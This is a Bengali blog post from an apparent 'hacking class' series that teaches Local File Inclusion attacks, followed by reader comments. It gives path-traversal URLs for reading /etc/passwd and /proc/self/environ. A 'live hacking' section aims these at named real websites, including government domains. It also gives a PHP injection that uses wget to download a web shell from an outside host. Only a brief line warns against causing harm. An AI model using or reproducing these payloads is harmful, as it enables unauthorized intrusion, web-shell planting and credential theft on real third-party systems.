আসসালামু আলাইকুম, সবাই্কে আবারও ভ্রাম্যমান হ্যাকিং ক্লাসে আপনাদের স্বাগতম। কেমন আছেন আছেন? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে আশেপাশের সবাইকে নিয়ে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।
হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ
- !i!i XSS এর একটি সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল !i!i পর্ব- ১
- i!i!i!i! কিভাবে RapidShare ক্র্যাক করবেন i!i!i!i! পর্ব- ২
- মাত্র ৫ মিনিটে একটি ওয়েবসাইট হ্যাকিং করুন (মেগা পোষ্ট) পর্ব- ৩
- আবারও হ্যাকিং করুন ওয়েব সাইট!!! এবারেরটা কতক্ষণ? ১০ মিনিটও লাগবে না | পর্ব- ৪
- XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব- ৫
- …::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
- IIS Exploit সম্পূর্ণ বাংলা হ্যাকিং টিউটোরিয়াল (উইন্ডোজ ৭) | পর্ব-৭
- ®¤Θ RTE হ্যাকিং টিউটোরিয়াল, হ্যাকিং করতে মাত্র কয়েকমিনিট সময় নেন ®¤Θ | পর্ব-৮
ইতিমধ্যে আমি মনে হয়, হ্যাকিংয়ের ধারাবাহিক পোষ্ট লেখা শুরু করেছি :P হা হা আপনারাও হ্যাকার হয়ে যাচ্ছেন। শুভ কামনা আপনাদের জন্য। হ্যাকিং শিখুন কিন্তু হ্যাকিং ক্ষতি করার উদ্দেশ্যে কাজে লাগাবেন না। মূলতঃ হ্যাকিং ম্যাথডের শেষ নেই। আশা করি কেউ বলতে পারবে না যে, আমি হ্যাকিংয়ের সবই পারি, তাহলে সে ভুল বলেছে। একের পর এক নিয়ম তৈরি হচ্ছে। হ্যাকিং করা হয় আসলে নিজের মেধা দিয়ে। আপনি যে ভাবে পারেন, হ্যাকিং করে যাবেন। আজ দেখাব হ্যাকিংয়ের আরেকটি জনপ্রিয় ম্যাথড। এটা অনেকেই ব্যবহার করে থাকে। চলুন তাহলে মূল পর্বে চলে যাওয়া যাক।
LFI! হ্যাকারদের একটি জনপ্রিয় ম্যাথড। এটি একটি সংক্ষিপ্ত নাম। এই সংক্ষিপ্ত শব্দটির পূর্ণরূপ হল Local File Inclusion. আজ আপনাদের হাতে-কলমে দেখাব কিভাবে আপনি একটা সাইটে LFI Injection দিতে হয়।
প্রথমে নিচের PHP কোডগুলো দেখুন…
<?php
$page=$_GET[page];
include($page);
?>
উপরে php কোডটি অনেক ওয়েবডেভেলপাররাই তাদের ওয়েবসাইটে ব্যবহার করে থাকে। কিন্তু এটি আসলে তারা ভুল করে থাকে। কারণ এই $page কোডটি sanitized না এবং এটি এটা হ্যাকারদের পথটা সহজ করে দেয়। মূলতঃ এই কোডটি হ্যাকাররা তাদের LFI হ্যাকিংয়ের কাজে ব্যবহার করে থাকে। আপনি যদি বিভিন্ন সাইট ঘুরে থাকেন, তাহলে হত নিচের কোড সাইটের লিংক দেখতে পারবে।
www.mywebsite.com/index.php?page=products.php
আপনি এই ধরনের সাইটে, কোন ধরনের পরীক্ষা ছাড়াই বুঝতে পারবেন যে, এটি একটি ভ্যালুয়েব ওয়েবসাইট। ধরেন আপনি একটা সাইটে ঢুকলেন, উক্ত সাইটের URL হল
www.mywebsite.com/index.php?page=mypage.php
এখানে দেখেন, mypage.php পাতাটি সার্ভারে নেই, তাই এটি একটি php error message ম্যাসেজ দেবে। যেমনঃ-
Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........
তাহলে এবার আমরা এই সাইটে প্রবেশ করব। আমরা জানলাম যে, এটি একটি vulnerable ওয়েবসাইট। যদি এই সাইটটি unix server এ হয়ে থাকে, তাহলে আমরা হয়ত পাসওয়ার্ডে ফাইলটি এখান থেকে বের করতে পারব। etc/passwd এই ডাইরেক্টরিতে সাধারণত পাসওয়ার্ড সংরক্ষিত থাকে। যেমনঃ
www.mywebsite.com/index.php?page=../etc/passwd www.mywebsite.com/index.php?page=../../etc/passwd www.mywebsite.com/index.php?page=../../../etc/passwd www.mywebsite.com/index.php?page=../../../../etc/passwd
এখন আমরা ../ ফাইলে প্রবেশ করে পাসওয়ার্ড নিতে চেষ্টা করব। এখানে একটা জিনিস মনে রাখেবন। সেটার জন্য নিচের লিংকটি দেখেন…
www.mywebsite.com/index.php?page=products
এখানে একটা জিনিস লক্ষ্য করুন যে, .php এর পর ?page=products রয়েছে। এটি আসলে ম্যানুয়ালি করা হয়েছে। তাই এখানে .php হল
<?php
$page=$_GET[page];
include($page.’php’);
?>
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
….:::::এবার আমরা Live হ্যাকিং দেখব:::::….
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox…-switcher/
4) Mozilla Firefox Browser
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ
<?php phpinfo();?>
disable_functions | no value | no value
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
http://www.lrh.gov.pk/Nursing_School/ind…lf/environ
http://www.aladde.org/index.php?load=../…lf/environ
http://www.findinsl.com/index.php?load=….lf/environ
http://www.holzprof.ee/index.php?action=…lf/environ
http://www.bislig.gov.ph/content1.php?pa…lf/environ
http://www.tendokarate.no/index.php?page…lf/environ
http://www.cranberries-gifts.co.uk/categ…lf/environ
ভাল টিউন ।
অনেক ভালো পোস্ট। ধন্যবাদ।
sundhor post bhaiya
ফাটাফাটি টিউন :D
আমরা আসা করি আমাদের অ রকম আরো ভালো ভলো টুইন korban
থাক you
চেষ্টা করব আরও ভাল ভাল পোষ্ট আপনাদের সাথে শেয়ার করতে। ধন্যবাদ
অনেক ধন্যবাদ ut ভাই
আপনাকে অনেক ধন্যবাদ বিল্লাহ ভাই :)
যদিও আগে পারতাম তবুও ধন্যবাদ শেয়ার করার জন্য
আসলে যেহেতু লেখা শুরু করেছি, তাই চিন্তা করলাম সবগুলোই দেই। যারা পারে না, তাদের জন্যও অনেক উপকার হবে আশা করি। আপনাকেও ধন্যবাদ
Nice post… Akta request korbo, tune korar last a jodi puro tune er akta pdf file diten tahole onek upokar hoto.
হা হা হা হা হা। আসলে পিডিএফ করার জন্য টিউনারপেজে অনেকগুলো সফটওয়্যার ও টুলস আছে। আপনি এটা ডাউনলোড করে নিন। তার পর আপনার পচন্দ অনুযায়ী পোষ্টটি পিডিএফ ফরম্যাটে ডাউনলোড করে নিতে পারবেন। ধন্যবাদ
আমার প্রিয় পোস্টের ঝুলি তো আপনার হ্যাকিং ক্লাস দিয়া ভইরা গেল। হে হে হে হে।
তাই নাকি ? আপনাকে ধন্যবাদ তানভীর ভাই :)
আর পর হয় না
একটা ফ্লাশ চট রুম আ Joomla! দু আসে ওই রুম তা কি ভাব হক করবো ?? নিচে হয়্সা
ঠিক বুঝলাম না। একটু পরিষ্কার করে বলুন।